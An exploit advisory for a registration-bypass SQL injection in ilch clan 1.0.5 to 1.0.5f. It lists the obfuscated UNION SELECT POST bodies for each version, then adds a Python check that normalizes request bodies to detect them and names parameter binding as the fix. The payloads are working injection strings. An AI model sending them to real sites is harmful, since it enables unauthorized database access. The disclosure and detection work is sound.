ilchClan 1.0.5 - 'regist.php' SQL Injection

EDB-ID: 17101
CVE: N/A
Platform: PHP
Published: 2011-04-02

 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
/                                  _____ _      _                                       \ 
\                                  \_   \ | ___| |__                                    /
/                                   / /\/ |/ __| '_ \                                   \
\                                /\/ /_ | | (__| | | |                                  /
/                                \____/ |_|\___|_| |_|                                  \
\               Security Flaw in ilch clan 1.0.5 a,b,c,d,e,f! in regist.php            /
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-                
                                         by
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
/                                                                                       \ 
\ ___ ___ ___ ___                         _ _           _____           _         _     /
/| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_   \
\|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|  /
/  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|    \
\                                              |___|                 |___|              /
/                                                                                       \
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                   SQL Injection Vulnerability in ilch clan 1.0.5 a,b,c,d,e,f! 
        Vulnerability Name : Registration Bypass SQL Injection Vulnerability 
                                 Date : 02.04.2011
                             SQL Injection method : $_POST   
                              Discovered by : Easy Laster
Security Group :Team-Internet,Undergroundagents,websec-empire.to and 4004-Security-Project.com
                               Greetings to free-hack.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                                      Security Flaws
                                 =-=-=-=-=-=-=-=-=-=-=-=
                                     ilch clan 1.0.5
checked=Gelesen+und+einverstanden&nutz=1'+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaa
                                     ilch clan 1.0.5a
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaa
                                     ilch clan 1.0.5b
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaa
                                     ilch clan 1.0.5c
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaa
                                     ilch clan 1.0.5d
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaaa
                                     ilch clan 1.0.5e
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaa
                                     ilch clan 1.0.5f
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaa
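
The request bodies above hide UNION SELECT in the nutz field behind mixed case and /**/ comments, so a plain substring match on the raw body misses them. The following detection check is an added example, not part of the original advisory or of the ilch code base; the function names are hypothetical, the first sample body is copied from the advisory, and the benign body is constructed.

```python
import re
from urllib.parse import parse_qsl

# Request body copied from the advisory (ilch clan 1.0.5 entry).
ADVISORY_BODY = ("checked=Gelesen+und+einverstanden"
                 "&nutz=1'+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaa")
# Constructed benign registration body for comparison.
BENIGN_BODY = "checked=Gelesen+und+einverstanden&nutz=Union_Jack&email=a%40example.org"

BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b")


def naive_match(body: str) -> bool:
    """Substring check on the raw body; shown only to illustrate what it misses."""
    return "union select" in body.lower()


def normalize(value: str) -> str:
    """Turn SQL block comments into spaces, collapse whitespace, lowercase."""
    value = BLOCK_COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip().lower()


def suspicious_fields(body: str) -> list:
    """Return names of form fields whose decoded, normalized value holds UNION SELECT."""
    hits = []
    # parse_qsl URL-decodes each value, including '+' to space.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if UNION_SELECT.search(normalize(value)):
            hits.append(name)
    return hits


if __name__ == "__main__":
    for label, body in (("advisory", ADVISORY_BODY), ("benign", BENIGN_BODY)):
        print(label, "naive:", naive_match(body), "normalized:", suspicious_fields(body))
```

Matching like this is a detection aid for request logs or a filtering rule; the flaw itself is fixed by binding nutz as a query parameter in regist.php.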